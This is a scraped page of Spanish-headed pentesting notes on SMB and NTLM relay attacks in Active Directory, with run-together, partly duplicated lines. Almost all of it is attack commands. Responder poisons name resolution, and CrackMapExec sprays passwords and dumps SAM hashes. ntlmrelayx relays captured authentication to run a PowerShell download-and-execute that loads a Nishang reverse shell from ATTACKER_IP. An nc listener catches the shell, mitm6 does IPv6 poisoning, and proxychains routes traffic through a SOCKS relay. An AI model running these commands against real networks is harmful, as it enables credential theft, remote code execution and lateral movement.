Samba & NTML Relay
IPv4
Samba Relay
sudo responder -I ens37 -dw
Password Spraying
NTML Relay

Ejecución de comandos
IPv6
Mitm6



Last updated
sudo responder -I ens37 -dw




Last updated
crackmapexec smb 100.100.100.0/24 -u 'Cbollin' -p 'Password1'sudo responder -I ens37 -dwsudo su && ntlmrelayx.py -tf targets.txt -smb2supportgit clone git clone https://github.com/samratashok/nishang
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 PS.ps1echo "Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port ATTACKER_PORT" >> PS.ps1 sudo python3 -m http.server
###
rlwrap -cAr nc -lvnp 1234sudo responder -I ens37 -dw
###
ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://ATTACKER_IP:8000/PS.ps1')"
mitm6 -d deimcorp.localntlmrelayx.py -6 -wh ATTACKER_IP -t smb://VICTIM_IP -socks -debug -smb2support#dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 1080
#socks5 127.0.0.1 1082
#socks5 127.0.0.1 1081
#socks5 127.0.0.1 1080proxychains crackmapexec smb 100.100.100.130 -u 'champi' -p 'loquesea' -d 'deimcorp.local' --sam 2>/dev/null